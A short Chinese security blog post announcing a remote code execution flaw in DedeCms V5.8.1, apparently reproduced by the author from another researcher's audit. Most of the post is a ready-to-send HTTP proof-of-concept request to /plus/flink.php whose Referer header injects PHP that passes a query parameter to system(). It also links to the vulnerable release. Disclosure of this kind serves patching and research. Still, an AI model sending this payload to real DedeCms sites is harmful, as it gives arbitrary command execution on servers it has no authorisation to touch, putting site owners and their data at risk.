DedeCms V5.8.1 RCE 漏洞

2021-10-1 / 0 评论 技术文章 / Mrxn

本文共计 794 字,感谢您的耐心浏览与评论.

昨天在一个老外的博客看到了他的一篇文章,讲的就是DedeCms 的预览版本 V5.8.1 存在 RCE 漏洞(远程代码执行漏洞);我刚刚复现了下,确实是存在的。

dedecms v5.8.1 RCE

POC:


GET /plus/flink.php?dopost=save&c=pwd HTTP/1.1
Host: dedecms.test
Pragma: no-cache
Cache-Control: no-cache
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 13904.16.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.25 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
sec-gpc: 1
referer: <?php "system"($c);die;/*
Connection: close


详细的代码审计可以看原文,跟着走一下就OK。

原文地址:https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html 

下载地址:https://github.com/dedecms/DedeCMS/releases/tag/v5.8.1 

标签: 漏洞 php rce

转载:转载请注明原文链接 - DedeCms V5.8.1 RCE 漏洞


0条回应:“DedeCms V5.8.1 RCE 漏洞”


发表评论

{view_code_no}